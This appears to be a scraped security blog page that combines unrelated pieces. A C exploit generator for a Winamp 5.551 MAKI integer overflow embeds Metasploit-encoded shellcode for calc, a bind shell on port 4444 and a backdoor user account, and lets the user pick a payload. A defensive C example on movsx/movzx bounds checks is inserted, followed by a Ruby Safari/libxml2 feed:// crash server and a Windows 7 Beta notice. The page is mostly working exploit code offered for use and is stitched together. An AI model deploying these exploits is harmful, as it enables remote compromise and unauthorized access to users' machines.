unsigned char Exception [] =
{
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF
};

/* win32_exec –  EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */

char Calc_ShellCode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
    "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
    "\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
    "\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
    "\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
    "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
    "\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
    "\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
    "\x4e\x46\x43\x36\x42\x50\x5a";

/* win32_bind –  EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */

char Bind_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
    "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
    "\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
    "\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
    "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
    "\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
    "\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
    "\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
    "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
    "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
    "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
    "\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
    "\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
    "\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
    "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
    "\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
    "\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
    "\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
    "\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
    "\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
    "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
    "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
    "\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
    "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
    "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
    "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
    "\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
    "\x4f\x4f\x42\x4d\x5a";

/* win32_adduser –  PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */

char Add_User_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
    "\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
    "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
    "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
    "\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
    "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
    "\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
    "\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
    "\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
    "\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
    "\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
    "\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
    "\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
    "\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
    "\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
    "\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
    "\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
    "\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
    "\x41\x44\x46\x44\x46\x44\x42\x30\x5a";

unsigned char Junk1 ='A';

int main()
{
    FILE *fp;
    int i;

    if ((fp = fopen(MAKI, "wb")) == NULL)
    {
        printf("File %s write error\n", MAKI);
        return(0);
    }

    for (i=0; i<sizeof(First_Header); i++)
        fputc(First_Header[i], fp);

    for (i=0; i<sizeof(Exception); i++)
        fputc(Exception[i], fp);

    for (i=0;i<16751;i++)
    {
        fwrite(&Junk1,1,1,fp);
    }
    fputs("\xeb\x06\x90\x90",fp);/* Pointer to next SEH record */
    fputs("\x7C\x14\xF0\x12",fp);/* SE handler universal address 12F0147C */

    int input;

    printf("\n------------------------------------------------------");
    printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
    printf("\n\nExploit created by n00b");
    printf( "\n[1]. Calc Shell_Code" );
    printf( "\n[2]. Bind Shell_Code on port 4444" );
    printf( "\n[3]. Add user Shell_Code" );
    printf( "\n[4]. To exit and cancel" );
    printf( "\nPlease choose your Shell_Code:" );
    if (scanf( "%d", &input ) != 1)   /* unreadable input is treated as cancel */
        input = 4;
    switch ( input )
    {
    case 1:
        for (i=0; i<sizeof(Calc_ShellCode); i++)
            fputc(Calc_ShellCode[i], fp);
        break;
    case 2:
        for (i=0; i<sizeof(Bind_Shellcode); i++)
            fputc(Bind_Shellcode[i], fp);
        break;
    case 3:
        for (i=0; i<sizeof(Add_User_Shellcode); i++)
            fputc(Add_User_Shellcode[i], fp);
        break;
    case 4:
        return 0;
        break;
    }
    fclose(fp);
    return 0;
}

// milw0rm.com [2009-05-26]
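The movsx-versus-movzx change the advisory header describes, as an added example that is neither the exploit's nor Winamp's code: it shows what each extension does to a 16-bit length of 0xFFFF, why a signed bounds check passes anyway, and a length-prefixed read that validates the zero-extended length against both the input and the destination. The record layout (little-endian 2-byte length, then the bytes) is an assumption made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What `movsx esi, ax` yields: the 16-bit value is sign-extended, so 0xFFFF
 * becomes -1 rather than 65535. */
int32_t sign_extend16(uint16_t v) { return (int16_t)v; }

/* What `movzx esi, ax` yields: the 16-bit value is zero-extended. */
uint32_t zero_extend16(uint16_t v) { return v; }

/* The value memmove's size_t parameter receives once a sign-extended length
 * is pushed as `Size`: -1 converts to SIZE_MAX, i.e. an unbounded copy. */
size_t memmove_size_after_movsx(uint16_t wire_len)
{
    int32_t len = sign_extend16(wire_len);
    return (size_t)len;
}

/* Vulnerable pattern: a bound check on the signed length is satisfied when
 * the length went negative, so it does not protect the copy that follows.
 * Returns 1 if the (broken) check would let the copy proceed. */
int vulnerable_check_passes(uint16_t wire_len, size_t capacity)
{
    int32_t len = sign_extend16(wire_len);
    return len <= (int32_t)capacity;        /* -1 <= 32 is true */
}

/* Hardened read of a length-prefixed string: the length is zero-extended,
 * must not exceed the bytes actually present in the record, and must leave
 * room for the terminator in dst. Returns the length copied, or -1. */
int read_len_prefixed(const uint8_t *in, size_t inlen, char *dst, size_t dstcap)
{
    if (in == NULL || dst == NULL || inlen < 2 || dstcap == 0)
        return -1;
    uint32_t len = (uint32_t)in[0] | ((uint32_t)in[1] << 8);  /* zero-extended */
    if (len > inlen - 2)                    /* claims more bytes than the record has */
        return -1;
    if (len >= dstcap)                      /* would not fit with its terminator */
        return -1;
    memmove(dst, in + 2, len);
    dst[len] = '\0';
    return (int)len;
}

/* Constructed records: a well-formed 5-byte string and one whose length
 * field is 0xFFFF, the value that sign-extends to -1. */
static const uint8_t GOOD_RECORD[] = { 0x05, 0x00, 'h', 'e', 'l', 'l', 'o' };
static const uint8_t BAD_RECORD[]  = { 0xFF, 0xFF, 'A', 'A', 'A' };

/* Parses one record into a fixed 32-byte buffer and returns the result of
 * read_len_prefixed, so callers need not manage the destination. */
int try_read(const uint8_t *rec, size_t reclen)
{
    char buf[32];
    return read_len_prefixed(rec, reclen, buf, sizeof buf);
}

int main(void)
{
    printf("0xFFFF via movsx: %d, via movzx: %u\n",
           sign_extend16(0xFFFF), zero_extend16(0xFFFF));
    printf("size memmove would receive after movsx: %zu\n",
           memmove_size_after_movsx(0xFFFF));
    printf("signed bound check lets 0xFFFF through: %d\n",
           vulnerable_check_passes(0xFFFF, 32));
    printf("hardened read, good record: %d\n", try_read(GOOD_RECORD, sizeof GOOD_RECORD));
    printf("hardened read, bad record: %d\n", try_read(BAD_RECORD, sizeof BAD_RECORD));
    return 0;
}
```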

Article link: https://www.cfresh.net/web-security/198

Safari RSS feed:// buffer overflow exploit code
#!/usr/bin/ruby
#
# Quick-n-dirty PoC for APPLE-SA-2009-05-12 ala CVE-2008-3529
# Safari RSS feed:// buffer overflow via libxml2 by KF of Digitalmunition and Netragard
# http://www.digitalmunition.com , http://www.netragard.com
#
# The application PubSubAgent quit unexpectedly.
#
# Process:         PubSubAgent [3764]
# Path:            /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent
# Identifier:      PubSubAgent
# Version:         ??? (???)
# Code Type:       X86 (Native)
# Parent Process:  launchd [282]
#
# Date/Time:       2008-10-31 15:31:41.355 -0400
# OS Version:      Mac OS X 10.5.5 (9F33)
# Report Version:  6
#
# Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
#  eax: 0x41414141  ebx: 0x94580535  ecx: 0x00136150  edx: 0x05050500
#  edi: 0x00007000  esi: 0x00100000  ebp: 0xbfffe298  esp: 0xbfffe220
#   ss: 0x0000001f  efl: 0x00010206  eip: 0x94580605   cs: 0x00000017
#   ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
#  cr2: 0x05050500
#
# On Windows libxml2.dll provides all the fun since there is no PubSubAgent
#
# EAX 0131FB10 ASCII "AAAAAAAAAAA…"
# ECX 003D0270
# EDX 00000000
# EBX 41414141
# ESP 030FE6FC
# EBP 030FE918
# ESI 0131FB08 ASCII "AAAAAAAAAAA…"
# EDI 41414141
# EIP 7C919084 ntdll.7C919084
#
# 7C919084   8B0B             MOV ECX,DWORD PTR DS:[EBX]
# 7C919086   3B4F 04          CMP ECX,DWORD PTR DS:[EDI+4]

require 'webrick'
include WEBrick

# That's right... no one is taking on water, this is public info (and has been for a while)!
# https://bugzilla.redhat.com/attachment.cgi?id=315480

XML_LOVE =
'<?xml version="1.0"?>' + "\n" +
'<!DOCTYPE longentity [' + "\n" +
'<!ELEMENT longentity (#PCDATA)>' + "\n" +
'<!ENTITY ' +
"A" * 1000 + " " +
'"ha"> ]>' + "\n" +
'<longentity location="&' +
"A" * 1000 +
';">text</longentity>' + "\n"

# The host the feed:// redirect points back to is taken from the command line;
# exit with a usage message instead of raising on nil when it is missing.
abort("usage: #{$0} <host or IP of this server>") unless ARGV[0]

REDIR_LOVE =
'<meta http-equiv="REFRESH" content="0;url=feed://' + ARGV[0] + '/pwn">'

s = HTTPServer.new( :Port => 80 )

class REDIRECT < HTTPServlet::AbstractServlet
def do_GET(req, res)
   res.body = REDIR_LOVE
   res['Content-Type'] = "text/html"
end
end

class XMLLOVER < HTTPServlet::AbstractServlet
def do_GET(req, res)
   res.body = XML_LOVE
   res['Content-Type'] = "text/xml"
end
end

s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)

trap("INT"){ s.shutdown }
s.start

# milw0rm.com [2009-05-26]

Article link: https://www.cfresh.net/web-security/199

Microsoft makes a basic mistake too: Microsoft corrects the Windows 7 Beta automatic shutdown deadline

This morning my Hotmail inbox received an email from Microsoft about Windows 7, correcting its earlier notice about the expiry of the Windows 7 Beta and the start of two-hourly automatic shutdowns. In the previous notice Microsoft gave 1 June 2009 as the date on which the Beta would begin shutting down every two hours; in today's email it corrected that date to 1 July 2009. The full email follows:

Exploring Windows: Special Beta Edition — Correction

Because you signed up to test the Windows 7 Beta, we recently sent you mail about the expiration dates for the Beta and Release Candidate. Unfortunately, we made a mistake.
The corrected sentence:
We said the Beta would start shutting down every two hours on June 1, 2009. The correct date is July 1, 2009.

The rest of the dates in the mail were correct. Here’s a quick summary:

Version              Starts shutting down every two hours    Expires
Beta                 July 1, 2009                            August 1, 2009
Release Candidate    March 1, 2010                           June 1, 2010

We apologize for the error and any confusion it may have caused.

Thanks again for helping us test Windows 7.

I never expected a multinational like M$ to make such a basic mistake; it is genuinely rare.

Article link: https://www.cfresh.net/other/200